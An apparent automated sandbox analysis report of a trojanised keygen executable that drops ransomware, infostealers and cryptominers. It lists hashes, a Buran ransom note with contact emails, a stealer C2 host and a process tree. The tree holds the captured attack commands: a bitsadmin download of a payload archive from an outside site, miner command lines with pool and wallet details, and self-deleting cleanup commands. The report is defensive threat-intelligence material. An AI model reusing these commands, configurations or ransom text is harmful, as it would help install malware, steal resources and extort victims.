Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1770s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    25-04-2021 09:56

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: rootiunik@cock.li and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: rootiunik@cock.li Reserved email: TimothyCrabtree@protonmail.com Your personal ID: 128-98E-B6E Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Emails

rootiunik@cock.li

TimothyCrabtree@protonmail.com

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 51 IoCs
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 16 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    1⤵
      PID:1408
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2376
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2660
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2636
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2556
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2336
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1944
            • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
              "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
              1⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:4080
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:2440
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                  3⤵
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4008
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:2156
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:1516
                • C:\Users\Admin\AppData\Local\Temp\is-R7IS5.tmp\Install.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-R7IS5.tmp\Install.tmp" /SL5="$40152,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:2448
                  • C:\Users\Admin\AppData\Local\Temp\is-4J7EI.tmp\Ultra.exe
                    "C:\Users\Admin\AppData\Local\Temp\is-4J7EI.tmp\Ultra.exe" /S /UID=burnerch1
                    4⤵
                    • Drops file in Drivers directory
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:2156
                    • C:\Program Files\Windows Security\YZURNWMYNO\ultramediaburner.exe
                      "C:\Program Files\Windows Security\YZURNWMYNO\ultramediaburner.exe" /VERYSILENT
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:4136
                      • C:\Users\Admin\AppData\Local\Temp\is-Q6TSU.tmp\ultramediaburner.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-Q6TSU.tmp\ultramediaburner.tmp" /SL5="$201E8,281924,62464,C:\Program Files\Windows Security\YZURNWMYNO\ultramediaburner.exe" /VERYSILENT
                        6⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of WriteProcessMemory
                        PID:4168
                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                          "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                          7⤵
                          • Executes dropped EXE
                          PID:4220
                    • C:\Users\Admin\AppData\Local\Temp\e8-59ed8-878-d78b5-1504eba89f64d\Lybecolyto.exe
                      "C:\Users\Admin\AppData\Local\Temp\e8-59ed8-878-d78b5-1504eba89f64d\Lybecolyto.exe"
                      5⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4212
                    • C:\Users\Admin\AppData\Local\Temp\55-88515-a86-4389b-5f18f5bdbb88a\Ryhigulytu.exe
                      "C:\Users\Admin\AppData\Local\Temp\55-88515-a86-4389b-5f18f5bdbb88a\Ryhigulytu.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4296
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\reyc3jeu.lc3\instEU.exe & exit
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:5008
                        • C:\Users\Admin\AppData\Local\Temp\reyc3jeu.lc3\instEU.exe
                          C:\Users\Admin\AppData\Local\Temp\reyc3jeu.lc3\instEU.exe
                          7⤵
                          • Executes dropped EXE
                          PID:4160
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cycwhllg.sa0\google-game.exe & exit
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4436
                        • C:\Users\Admin\AppData\Local\Temp\cycwhllg.sa0\google-game.exe
                          C:\Users\Admin\AppData\Local\Temp\cycwhllg.sa0\google-game.exe
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          PID:4940
                          • C:\Windows\SysWOW64\rundll32.exe
                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                            8⤵
                            • Loads dropped DLL
                            PID:4124
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\emigwt5c.bie\md1_1eaf.exe & exit
                        6⤵
                          PID:3872
                          • C:\Users\Admin\AppData\Local\Temp\emigwt5c.bie\md1_1eaf.exe
                            C:\Users\Admin\AppData\Local\Temp\emigwt5c.bie\md1_1eaf.exe
                            7⤵
                            • Executes dropped EXE
                            • Checks whether UAC is enabled
                            PID:4944
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cafwohdi.wy4\y1.exe & exit
                          6⤵
                            PID:4144
                            • C:\Users\Admin\AppData\Local\Temp\cafwohdi.wy4\y1.exe
                              C:\Users\Admin\AppData\Local\Temp\cafwohdi.wy4\y1.exe
                              7⤵
                                PID:5156
                                • C:\Users\Admin\AppData\Local\Temp\ZXIF9x2tNl.exe
                                  "C:\Users\Admin\AppData\Local\Temp\ZXIF9x2tNl.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  PID:3812
                                  • C:\Users\Admin\AppData\Roaming\1619344874482.exe
                                    "C:\Users\Admin\AppData\Roaming\1619344874482.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619344874482.txt"
                                    9⤵
                                    • Executes dropped EXE
                                    PID:3880
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\ZXIF9x2tNl.exe"
                                    9⤵
                                      PID:5620
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping 127.0.0.1 -n 3
                                        10⤵
                                        • Runs ping.exe
                                        PID:5256
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\cafwohdi.wy4\y1.exe"
                                    8⤵
                                      PID:772
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /T 10 /NOBREAK
                                        9⤵
                                        • Delays execution with timeout.exe
                                        PID:6108
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zqirdfjy.k2b\askinstall39.exe & exit
                                  6⤵
                                    PID:5360
                                    • C:\Users\Admin\AppData\Local\Temp\zqirdfjy.k2b\askinstall39.exe
                                      C:\Users\Admin\AppData\Local\Temp\zqirdfjy.k2b\askinstall39.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:5640
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c taskkill /f /im chrome.exe
                                        8⤵
                                          PID:5468
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im chrome.exe
                                            9⤵
                                            • Kills process with taskkill
                                            PID:5648
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3jclc4ud.1fh\inst.exe & exit
                                      6⤵
                                        PID:5616
                                        • C:\Users\Admin\AppData\Local\Temp\3jclc4ud.1fh\inst.exe
                                          C:\Users\Admin\AppData\Local\Temp\3jclc4ud.1fh\inst.exe
                                          7⤵
                                            PID:5924
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0tzq2wsq.nwj\SunLabsPlayer.exe /S & exit
                                          6⤵
                                            PID:5164
                                            • C:\Users\Admin\AppData\Local\Temp\0tzq2wsq.nwj\SunLabsPlayer.exe
                                              C:\Users\Admin\AppData\Local\Temp\0tzq2wsq.nwj\SunLabsPlayer.exe /S
                                              7⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Drops file in Program Files directory
                                              PID:4100
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                8⤵
                                                  PID:4176
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                  8⤵
                                                    PID:4852
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:4556
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:5936
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:5944
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:5976
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:5628
                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                              8⤵
                                                              • Download via BitsAdmin
                                                              PID:5400
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQGiWRM0rcPUBXqC -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:3968
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pA4ibSiETYDLITxK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:2984
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:5092
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:5460
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:2396
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:5504
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:5368
                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uWObqeM\uWObqeM.dll" uWObqeM
                                                                        8⤵
                                                                        • Loads dropped DLL
                                                                        PID:5056
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uWObqeM\uWObqeM.dll" uWObqeM
                                                                          9⤵
                                                                          • Loads dropped DLL
                                                                          • Drops file in System32 directory
                                                                          PID:2728
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:4228
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            9⤵
                                                                            • Executes dropped EXE
                                                                            • Checks processor information in registry
                                                                            PID:4116
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:5024
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:4252
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:6076
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  9⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5924
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdC03B.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5420
                                                                                • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:5668
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yrgr4ejy.mtq\GcleanerWW.exe /mixone & exit
                                                                              6⤵
                                                                                PID:5492
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kedllxmv.oqv\toolspab1.exe & exit
                                                                                6⤵
                                                                                  PID:5756
                                                                                  • C:\Users\Admin\AppData\Local\Temp\kedllxmv.oqv\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\kedllxmv.oqv\toolspab1.exe
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:6052
                                                                                    • C:\Users\Admin\AppData\Local\Temp\kedllxmv.oqv\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\kedllxmv.oqv\toolspab1.exe
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:5184
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\55jlgsms.lhm\c7ae36fa.exe & exit
                                                                                  6⤵
                                                                                    PID:5980
                                                                                    • C:\Users\Admin\AppData\Local\Temp\55jlgsms.lhm\c7ae36fa.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\55jlgsms.lhm\c7ae36fa.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:5444
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o0mqloy0.21j\app.exe /8-2222 & exit
                                                                                    6⤵
                                                                                      PID:5216
                                                                                      • C:\Users\Admin\AppData\Local\Temp\o0mqloy0.21j\app.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\o0mqloy0.21j\app.exe /8-2222
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4416
                                                                                        • C:\Users\Admin\AppData\Local\Temp\o0mqloy0.21j\app.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\o0mqloy0.21j\app.exe" /8-2222
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:4540
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Modifies system certificate store
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:4368
                                                                              • C:\Users\Admin\AppData\Roaming\7ECB.tmp.exe
                                                                                "C:\Users\Admin\AppData\Roaming\7ECB.tmp.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:3836
                                                                                • C:\Users\Admin\AppData\Roaming\7ECB.tmp.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\7ECB.tmp.exe"
                                                                                  4⤵
                                                                                    PID:4116
                                                                                • C:\Users\Admin\AppData\Roaming\8275.tmp.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\8275.tmp.exe"
                                                                                  3⤵
                                                                                    PID:4920
                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                      -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w31796@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                      4⤵
                                                                                        PID:4804
                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w12023 --cpu-max-threads-hint 50 -r 9999
                                                                                        4⤵
                                                                                        • Blocklisted process makes network request
                                                                                        PID:3752
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                      3⤵
                                                                                        PID:5564
                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                          ping 127.0.0.1
                                                                                          4⤵
                                                                                          • Runs ping.exe
                                                                                          PID:5776
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks whether UAC is enabled
                                                                                      PID:5500
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      PID:5664
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:3064
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5344
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5092
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:6000
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                    1⤵
                                                                                      PID:1256
                                                                                    • c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                      1⤵
                                                                                        PID:1216
                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                        1⤵
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Modifies data under HKEY_USERS
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3944
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                          2⤵
                                                                                          • Drops file in System32 directory
                                                                                          • Checks processor information in registry
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:1196
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                        1⤵
                                                                                          PID:1100
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                          1⤵
                                                                                          • Drops file in System32 directory
                                                                                          PID:936
